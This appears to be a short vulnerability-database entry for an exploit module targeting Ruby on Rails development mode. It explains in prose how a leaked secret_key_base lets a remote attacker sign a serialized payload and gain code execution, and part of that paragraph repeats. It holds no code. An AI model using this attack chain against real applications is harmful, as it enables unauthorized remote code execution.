module
Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability
| Disclosed |
|---|
| 2019-03-13 |
Disclosed
2019-03-13
Description
This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails
application would use its name as the secret_key_base, and can be easily extracted by
visiting an invalid resource for a path. As a result, this allows a remote user to
create and deliver a signed serialized payload, load it by the application, and gain
remote code execution.
application would use its name as the secret_key_base, and can be easily extracted by
visiting an invalid resource for a path. As a result, this allows a remote user to
create and deliver a signed serialized payload, load it by the application, and gain
remote code execution.
NEW
Explore Exposure Command
Confidently identify and prioritize exposures from endpoint to cloud with full attack surface visibility and threat-aware risk context.